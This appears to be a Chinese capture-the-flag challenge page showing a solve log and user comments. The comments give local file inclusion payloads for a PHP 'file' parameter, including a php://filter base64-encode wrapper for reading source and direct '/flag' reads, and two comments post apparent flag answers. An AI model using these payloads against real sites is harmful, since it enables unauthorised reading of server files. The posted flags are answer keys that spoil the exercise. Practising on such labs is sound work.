评分(11)
解题动态
1302074808 攻破了该题 12小时前
1166 攻破了该题 12小时前
18995826257 攻破了该题 23小时前
LLLEI 攻破了该题 23小时前
qq111111 攻破了该题 1天前
wxj 攻破了该题 1天前
红罐凉茶爱拿铁 攻破了该题 1天前
liffer 攻破了该题 2天前
treesky 攻破了该题 2天前
舰长 攻破了该题 2天前
小熊 攻破了该题 2天前
buuku 攻破了该题 2天前
千洛十安 攻破了该题 2天前
aaa30950 攻破了该题 2天前
我是新手* 攻破了该题 2天前
Tychema 攻破了该题 2天前
网安80分 攻破了该题 2天前
gleam 攻破了该题 2天前
zx666 攻破了该题 2天前
评论
zhuizhui 9月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 11月前
举报
index.php?file=/flag
shingu 1年前
举报
这题过于简单了。?file=/flag。
HK1ng 1年前
举报
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
000ooo 1年前
举报
/index.php?file=/flag
哈哈哈嘿嘿嘿 1年前
举报
为什么
Zhumeng 1年前
举报
php伪协议读取index.php
Jiafeng 1年前
举报
我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php
Wang_Micro 1年前
举报
flag{642c1d8cf84d01e3a2df403e83d3e43b}
33555 1年前
举报
/index.php?file=///flag
Pearpeach1 1年前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
hao7 1年前
举报
flag{dff1aea3fcdd906ce70c1998addf1ccc}